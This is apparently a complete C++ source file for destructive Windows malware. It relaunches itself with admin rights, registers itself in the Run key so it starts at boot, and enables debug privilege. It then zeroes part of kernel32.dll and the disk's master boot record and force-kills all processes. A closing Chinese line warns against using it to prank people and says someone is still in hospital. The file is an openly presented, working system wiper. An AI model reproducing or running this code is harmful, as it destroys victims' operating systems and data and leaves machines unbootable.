#include <iostream>
#include <cstdlib>
#include <windows.h>
#include<bits/stdc++.h>
#include<ctime>
#include <stdio.h>
#include <string>
#include <tchar.h>
#include <shellapi.h>
using namespace std;
void SetStartup()
{
TCHAR path[MAX_PATH];
GetModuleFileName(NULL, path, MAX_PATH);
HKEY hKey;
LONG result = RegOpenKeyEx(HKEY_CURRENT_USER,
_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
0,
KEY_SET_VALUE,
&hKey);
if (result == ERROR_SUCCESS) {
RegSetValueEx(hKey, _T("MyStartupApp"), 0, REG_SZ,
(const BYTE*)path, (lstrlen(path) + 1) * sizeof(TCHAR));
RegCloseKey(hKey);
} else {
}
}
bool IsRunningAsAdmin()
{
BOOL isAdmin = FALSE;
PSID administratorsGroup = NULL;
SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;
if (AllocateAndInitializeSid(&ntAuthority, 2,
SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&administratorsGroup))
{
CheckTokenMembership(NULL, administratorsGroup, &isAdmin);
FreeSid(administratorsGroup);
}
return isAdmin == TRUE;
}
void RestartAsAdmin()
{
if (IsRunningAsAdmin())
{
return; // Already running as admin
}
TCHAR szFilePath[MAX_PATH];
if (GetModuleFileName(NULL, szFilePath, MAX_PATH))
{
SHELLEXECUTEINFO sei = { sizeof(sei) };
sei.lpVerb = TEXT("runas");
sei.lpFile = szFilePath;
sei.nShow = SW_SHOWNORMAL;
if (!ShellExecuteEx(&sei))
{
// Handle error
}
}
}
VOID
DebugPriv(
VOID
)
{
HANDLE Token;
UCHAR Buf[sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES)];
PTOKEN_PRIVILEGES Privs;
if (OpenProcessToken(GetCurrentProcess(),
MAXIMUM_ALLOWED,
&Token)) {
Privs = (PTOKEN_PRIVILEGES)Buf;
Privs->PrivilegeCount = 1;
Privs->Privileges[0].Luid.LowPart = 20L;
Privs->Privileges[0].Luid.HighPart = 0;
Privs->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(Token,
FALSE,
Privs,
0,
NULL,
NULL);
CloseHandle(Token);
}
}
void kill_mbr()
{
FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");
char mbr[512]={ 0 };
fwrite(mbr, sizeof(mbr), 1, disk);
fclose(disk);
}
void infect()
{
FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");
char write[666] = { 0 };
fwrite(write, sizeof(write), 1, infect_file);
fclose(infect_file);
}
int main()
{
RestartAsAdmin();
SetStartup();
infect();
kill_mbr();
system("taskkill /f /fi \"pid ne 1\"");
return 0;
}
不要去整人,现在还在医院里(((